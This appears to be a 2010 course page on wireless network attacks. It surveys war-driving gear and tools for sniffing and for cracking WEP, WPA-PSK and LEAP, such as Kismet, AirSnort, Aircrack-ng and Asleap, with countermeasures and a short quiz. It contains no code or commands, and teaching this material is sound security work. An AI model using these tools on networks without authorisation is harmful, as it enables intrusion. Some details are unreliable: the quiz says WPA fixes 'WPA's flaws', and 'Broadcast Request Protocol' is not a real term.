Wireless Hacking
War Driving
War driving can be done on foot with a laptop and involves listening for beacons as well as transmitting your own beacons in order to get a response. The type of antennae and signal strength depends on the job of course and choosing the right card can make all the difference.
Cards
Cards can be chosen for their adaptability to external antennae as well as compatibility with different OS's. Unix requires the kernel to be re-compiled for the use of wireless cards. Windows is the easiest setup though the least useful in hacking. Linux is the best supported OS for attack tools, drivers, and sniffers.
Antennae
Directional (power and waves tightly focused), multidirectional (lower range due to distribution), omni-directional (most effective for driving). Focus (wide or narrow); gain (high or low) Gain: energy of a directionally focused antenna HyperLinkTech is known for high-power, long-range antennae.
GPS
The equivalent of a network mapping tool.
War-Driving Software
Netstumbler is a Windows-based war-driving tool that uses GPS to mark the relative location of of wireless networks after detecting them. Simple Countermeasure: disable the 802.11 feature that responds to Broadcast Probe Requests. Kismet is a Linux and BSD based wireless sniffer that does the same as NetStumbler in addition to gathering information about a wireless network such as IP addressing as well as Cisco Discovery Protocol (CDP) names by passive network detection. As the best war-driving tool available, it has few countermeasures besides disabling Broadcast Request Protocol.
Wireless Mapping Tools
Stumbverter uses MapPoint 2002 to plot data from files in the NetStumbler format. GPSMap comes with Kismet and does a similar task. JiGLE is a java client that allows data from the Wireless Geographic Logging Engine (WiGLE) to be viewed. WiGLE is a huge database of wireless networks that along with DiGLE provides lots of info about various AP's.
Scanning and Enumeration
Wireless sniffing can be done by putting the wireless card into promiscuous mode and using a variety of monitoring tools.
Wireless Monitoring Tools
tcpdump can be used as a UNIX network monitoring tool and for the decoding of 802.11 frame information. Wireshark supports, captures, and decodes 802.11 packets with libpcap on UNIX systems and directly capture them in Windows. Airfart's Linux-born GTK interface is capable of displaying the MAC address of an AP, SSID, manufacturer, signal strength, active, and # of packets received.
Countermeasures
MAC Access Control and SSID are ultimately discoverable by a variety of tactics. Your only remaining countermeasure is strong encryption.
Encryption
Wired Equivalent Privacy (WEP) is only as strong as its key and seeks to protect data from passive or accidental eavesdropping. AirSnort determines the strength of the key and is used for wireless packet cracking. DWEPCrack uses MAC Address Control to attempt to output the WEP key. WEPAttack does the same with John the Ripper, a dictionary brute force tool.Countermeasures include crafty key selection or WPA encryption.
WPA
Designed to address the flaws of WEP, WPA authenticates using a 256-bit pre-shared key (PSK), uses unicast or global encryption keys and a message integrity code to prevent replay. Aircrack-ng uses offline dictionary attacks to break weak passphrases so foolishly chosen. Strong PSK's prevent this and Dos attacks.
Cisco's LEAP
This implements strong two-way authentication and encryption over a network. Anwrap targets weak LEAP-enabled Cisco wireless devices, while Asleap grabs and decrypts weak LEAP passwords. Strong authentication is the countermeasure for both tools.
Quiz
1. What are 2 tools that use GPS to map AP's? (Stumbverter, JiGLE, GPSMap)
2. What OS provides the most options for wireless hacking? (Linux)
3. What is one tool that attacks WEP? (AirSnort, DWEPCrack, WEPAttack)
4. What is one of the features of WPA that attempts to address WPA's flaws?(256-bit PSK, unicast or global encryption keys, message integrity code)
Back to Cptr427Winter2010